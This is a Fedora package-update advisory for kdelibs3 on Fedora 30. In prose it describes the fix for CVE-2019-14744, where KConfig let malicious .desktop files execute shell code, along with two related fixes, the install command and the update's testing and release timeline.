FEDORA-2019-f9f78895c3 created by kkofler 4 months ago for Fedora 30
stable

This update fixes CVE-2019-14744 (kconfig arbitrary shell code execution) in the KDE 3 compatibility version of kdelibs used by legacy KDE 3 applications.

The full list of fixes in this kdelibs3 build:

  • fixes CVE-2019-14744 - kconfig: malicious .desktop files (and others) would execute code. KConfig had a well-meaning feature that allowed configuration files to execute arbitrary shell commands. Unfortunately, this could be abused by untrusted .desktop files to execute arbitrary code as the target user, without the user even running the .desktop file. Therefore, this update removes that ill-fated feature. (Backported by Kevin Kofler from upstream: kf5-kconfig fix by David Faure, kdelibs 4 backport by Kai Uwe Broulik.)
  • adds native support for xdg-user-dirs for Desktop and Documents, without shelling out to xdg-user-dir from the config file. This is needed due to the above security fix. (This feature was previously implemented in the Fedora kde-settings by shelling out to xdg-user-dir from the config file using the KConfig feature removed above.) (Backported by Kevin Kofler from Trinity Desktop / Timothy Pearson.)
  • fixes a KJS double-free that could crash legacy KDE 3 applications such as Quanta Plus when trying to execute JavaScript. (Backported by OpenSUSE / Wolfgang Bauer from Trinity Desktop / Timothy Pearson.)

How to install

sudo dnf upgrade --advisory=FEDORA-2019-f9f78895c3

This update has been submitted for testing by kkofler.

4 months ago

This update's test gating status has been changed to 'waiting'.

4 months ago

This update's test gating status has been changed to 'ignored'.

4 months ago

This update has been pushed to testing.

4 months ago

This update's test gating status has been changed to 'greenwave_failed'.

4 months ago

This update's test gating status has been changed to 'ignored'.

4 months ago

kkofler edited this update.

4 months ago

This update has been submitted for stable by kkofler.

4 months ago

This update has been pushed to stable.

4 months ago

Please login to add feedback.

Metadata
Type
security
Severity
urgent
Karma
0
Signed
Content Type
RPM
Test Gating
Settings
Unstable by Karma
-10
Dates
submitted
4 months ago
in testing
4 months ago
in stable
4 months ago
modified
4 months ago
BZ#1740138 CVE-2019-14744 kdelibs: malicious desktop files and configuration files lead to code execution with minimal user interaction
0
0

Automated Test Results